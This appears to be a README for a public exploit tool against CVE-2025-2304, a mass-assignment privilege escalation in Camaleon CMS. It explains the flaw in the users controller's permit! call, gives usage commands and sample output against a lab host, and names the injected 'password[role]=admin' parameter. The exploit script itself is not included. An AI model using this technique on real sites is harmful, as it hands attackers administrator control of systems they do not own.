## https://sploitus.com/exploit?id=EEA8B8A6-7D93-5960-98E3-B3A6013CABBA
# CVE-2025-2304 Exploit
Camaleon CMS Vulnerable to Privilege Escalation through a Mass Assignment
## Vulnerability Description
A Privilege Escalation through a Mass Assignment exists in Camaleon CMS
When a user wishes to change his password, the 'updated_ajax' method of the UsersController is called. The vulnerability stems from the use of the dangerous permit! method, which allows all parameters to pass through without any filtering.
## Requirements
```bash
pip install requests beautifulsoup4
```
## Usage
```bash
python exploit.py --url http://target.com -u username -p password
```
### Arguments
- `--url` - Base URL of the vulnerable application
- `-u` - Username for authentication
- `-p` - Password for authentication
## Example
```bash
python exploit.py --url http://facts.htb -u krrish -p krrish
```
Output:
```
[*] Logging in as krrish...
[*] Exploiting...
[+] Exploited! You're admin now
```
## How It Works
1. Authenticates with provided credentials
2. Sends password update request with injected `password[role]=admin` parameter
3. Escalates user privileges to administrator
## Disclaimer
This tool is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal.
## Author
https://x.com/krrishbhurani
https://www.linkedin.com/in/krrish-bhurani/